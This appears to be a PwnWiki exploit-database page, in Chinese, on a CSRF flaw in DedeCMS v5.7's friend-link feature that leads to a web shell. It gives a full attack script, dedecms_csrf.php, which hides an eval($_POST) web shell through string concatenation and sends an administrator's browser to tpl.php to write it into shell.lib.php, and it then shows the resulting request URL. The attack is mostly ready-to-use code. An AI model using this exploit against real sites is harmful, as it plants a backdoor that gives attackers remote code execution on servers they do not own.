Loading
0

DedeCMS v5.7 友情链接CSRF GetShell漏洞/zh-tw

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

漏洞利用

Apply.png

Edit.png

dedecms_csrf.php 的内容如下:

<?php
$referer = $_SERVER'HTTP_REFERER';
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
$muma = '<'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.''.'\''.'c'.'\''.''.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
header("location: ".$url);
exit();

管理员:

Link list.png

由于友链中使用了header 跳转,所以结果其实是访问了

http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%email protected($_POST%27c%27);?%3E&filename=shell.lib.php

请求。

shell.lib.php:

Shell.png

免费、自由、人人可编辑的漏洞库--pwnwiki.com